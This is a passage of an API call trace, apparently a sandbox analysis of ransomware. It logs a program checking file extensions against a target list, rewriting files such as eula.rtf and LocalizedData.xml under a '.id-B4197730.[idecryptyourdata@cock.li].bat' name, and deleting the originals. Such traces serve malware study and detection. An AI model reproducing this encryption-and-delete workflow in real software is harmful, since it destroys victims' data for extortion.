35 [0047.363] lstrlenW (lpString=".dbf") returned 4 [0047.363] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.363] lstrlenW (lpString=".1cd") returned 4 [0047.363] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.363] lstrlenW (lpString=".jpg") returned 4 [0047.363] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.364] lstrlenW (lpString=".doc") returned 4 [0047.364] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.364] lstrlenW (lpString=".docx") returned 5 [0047.364] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.364] lstrlenW (lpString=".pdf") returned 4 [0047.364] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.364] lstrlenW (lpString=".xls") returned 4 [0047.364] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.364] lstrlenW (lpString=".xlsx") returned 5 [0047.364] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.364] lstrlenW (lpString=".ppt") returned 4 [0047.364] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.364] lstrlenW (lpString=".zip") returned 4 [0047.364] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.364] lstrlenW (lpString=".rar") returned 4 [0047.364] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.364] lstrlenW (lpString=".bz2") returned 4 [0047.364] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.364] lstrlenW (lpString=".7z") returned 3 [0047.364] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.364] lstrlenW (lpString=".dbf") returned 4 [0047.364] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.364] lstrlenW (lpString=".1cd") returned 4 [0047.364] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.364] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\eula.rtf") returned 35 [0047.364] lstrlenW (lpString=".jpg") returned 4 [0047.365] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.365] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.365] lstrlenW (lpString="eula.rtf") returned 8 [0047.365] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.365] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3046) returned 1 [0047.365] CloseHandle (hObject=0x2c4) returned 1 [0047.365] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 0x80 [0047.365] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.365] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.366] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.366] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.366] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.366] GetLastError () returned 0x0 [0047.366] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xbe6, lpOverlapped=0x0) returned 1 [0047.393] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xbf0, lpOverlapped=0x0) returned 1 [0047.393] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.394] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.394] SetEndOfFile (hFile=0x2d8) returned 1 [0047.394] CloseHandle (hObject=0x2d8) returned 1 [0047.394] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.394] SetEndOfFile (hFile=0x2c4) returned 1 [0047.395] CloseHandle (hObject=0x2c4) returned 1 [0047.395] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.396] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 1 [0047.396] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.396] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.396] lstrlenW (lpString=".doc") returned 4 [0047.396] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.396] lstrlenW (lpString=".docx") returned 5 [0047.396] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.396] lstrlenW (lpString=".pdf") returned 4 [0047.396] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.396] lstrlenW (lpString=".xls") returned 4 [0047.396] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.396] lstrlenW (lpString=".xlsx") returned 5 [0047.396] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.396] lstrlenW (lpString=".ppt") returned 4 [0047.396] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.396] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.397] lstrlenW (lpString=".zip") returned 4 [0047.397] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.397] lstrlenW (lpString=".rar") returned 4 [0047.397] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.397] lstrlenW (lpString=".bz2") returned 4 [0047.397] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.397] lstrlenW (lpString=".7z") returned 3 [0047.397] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.397] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.397] lstrlenW (lpString=".dbf") returned 4 [0047.397] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.397] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.397] lstrlenW (lpString=".1cd") returned 4 [0047.397] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.397] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.397] lstrlenW (lpString=".jpg") returned 4 [0047.397] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.397] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.397] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.397] lstrlenW (lpString=".doc") returned 4 [0047.397] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.397] lstrlenW (lpString=".docx") returned 5 [0047.397] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.397] lstrlenW (lpString=".pdf") returned 4 [0047.397] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.397] lstrlenW (lpString=".xls") returned 4 [0047.397] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.397] lstrlenW (lpString=".xlsx") returned 5 [0047.397] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.397] lstrlenW (lpString=".ppt") returned 4 [0047.398] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.398] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.398] lstrlenW (lpString=".zip") returned 4 [0047.398] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.398] lstrlenW (lpString=".rar") returned 4 [0047.398] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.398] lstrlenW (lpString=".bz2") returned 4 [0047.398] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.398] lstrlenW (lpString=".7z") returned 3 [0047.398] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.398] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.398] lstrlenW (lpString=".dbf") returned 4 [0047.398] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.398] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.398] lstrlenW (lpString=".1cd") returned 4 [0047.398] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.398] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 35 [0047.398] lstrlenW (lpString=".jpg") returned 4 [0047.398] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.398] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.398] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.398] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.399] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=79296) returned 1 [0047.399] CloseHandle (hObject=0x2c4) returned 1 [0047.399] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 0x80 [0047.399] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.399] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.399] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.399] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.399] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.399] GetLastError () returned 0x0 [0047.399] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x135c0, lpOverlapped=0x0) returned 1 [0047.450] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x135d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x135d0, lpOverlapped=0x0) returned 1 [0047.452] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.452] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.452] SetEndOfFile (hFile=0x2d8) returned 1 [0047.452] CloseHandle (hObject=0x2d8) returned 1 [0047.454] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.455] SetEndOfFile (hFile=0x2c4) returned 1 [0047.456] CloseHandle (hObject=0x2c4) returned 1 [0047.456] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.456] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 1 [0047.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.457] lstrlenW (lpString=".doc") returned 4 [0047.457] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.457] lstrlenW (lpString=".docx") returned 5 [0047.457] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.457] lstrlenW (lpString=".pdf") returned 4 [0047.457] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.457] lstrlenW (lpString=".xls") returned 4 [0047.457] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.457] lstrlenW (lpString=".xlsx") returned 5 [0047.457] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.457] lstrlenW (lpString=".ppt") returned 4 [0047.457] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.457] lstrlenW (lpString=".zip") returned 4 [0047.457] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.457] lstrlenW (lpString=".rar") returned 4 [0047.457] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.457] lstrlenW (lpString=".bz2") returned 4 [0047.457] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.457] lstrlenW (lpString=".7z") returned 3 [0047.457] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.457] lstrlenW (lpString=".dbf") returned 4 [0047.457] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.457] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.457] lstrlenW (lpString=".1cd") returned 4 [0047.458] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.458] lstrlenW (lpString=".jpg") returned 4 [0047.458] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.458] lstrlenW (lpString=".doc") returned 4 [0047.458] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString=".docx") returned 5 [0047.458] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.458] lstrlenW (lpString=".pdf") returned 4 [0047.458] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString=".xls") returned 4 [0047.458] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString=".xlsx") returned 5 [0047.458] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.458] lstrlenW (lpString=".ppt") returned 4 [0047.458] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.458] lstrlenW (lpString=".zip") returned 4 [0047.458] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.458] lstrlenW (lpString=".rar") returned 4 [0047.458] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString=".bz2") returned 4 [0047.458] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.458] lstrlenW (lpString=".7z") returned 3 [0047.458] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.458] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.459] lstrlenW (lpString=".dbf") returned 4 [0047.459] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.459] lstrlenW (lpString=".1cd") returned 4 [0047.459] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.459] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 44 [0047.459] lstrlenW (lpString=".jpg") returned 4 [0047.459] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.459] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.459] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.459] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.459] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=82374) returned 1 [0047.459] CloseHandle (hObject=0x2c4) returned 1 [0047.459] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 0x80 [0047.460] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.460] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.460] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.460] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.460] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0047.460] GetLastError () returned 0x0 [0047.460] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x141c6, lpOverlapped=0x0) returned 1 [0047.499] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x141d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x141d0, lpOverlapped=0x0) returned 1 [0047.501] ReadFile (in: hFile=0x2c4, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.501] WriteFile (in: hFile=0x2d8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.502] SetEndOfFile (hFile=0x2d8) returned 1 [0047.502] CloseHandle (hObject=0x2d8) returned 1 [0047.504] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.504] SetEndOfFile (hFile=0x2c4) returned 1 [0047.506] CloseHandle (hObject=0x2c4) returned 1 [0047.506] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.506] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 1 [0047.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.507] lstrlenW (lpString=".doc") returned 4 [0047.507] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString=".docx") returned 5 [0047.507] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.507] lstrlenW (lpString=".pdf") returned 4 [0047.507] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString=".xls") returned 4 [0047.507] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString=".xlsx") returned 5 [0047.507] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.507] lstrlenW (lpString=".ppt") returned 4 [0047.507] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.507] lstrlenW (lpString=".zip") returned 4 [0047.507] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.507] lstrlenW (lpString=".rar") returned 4 [0047.507] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString=".bz2") returned 4 [0047.507] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString=".7z") returned 3 [0047.507] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.507] lstrlenW (lpString=".dbf") returned 4 [0047.507] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.507] lstrlenW (lpString=".1cd") returned 4 [0047.507] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.507] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.507] lstrlenW (lpString=".jpg") returned 4 [0047.508] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.508] lstrlenW (lpString=".doc") returned 4 [0047.508] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString=".docx") returned 5 [0047.508] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.508] lstrlenW (lpString=".pdf") returned 4 [0047.508] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString=".xls") returned 4 [0047.508] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString=".xlsx") returned 5 [0047.508] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.508] lstrlenW (lpString=".ppt") returned 4 [0047.508] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.508] lstrlenW (lpString=".zip") returned 4 [0047.508] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.508] lstrlenW (lpString=".rar") returned 4 [0047.508] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString=".bz2") returned 4 [0047.508] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString=".7z") returned 3 [0047.508] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.508] lstrlenW (lpString=".dbf") returned 4 [0047.508] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 [0047.508] lstrlenW (lpString=".1cd") returned 4 [0047.508] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.508] lstrlenW (lpString="C:\\588bce7c90097ed212\\1045\\LocalizedData.xml") returned 44 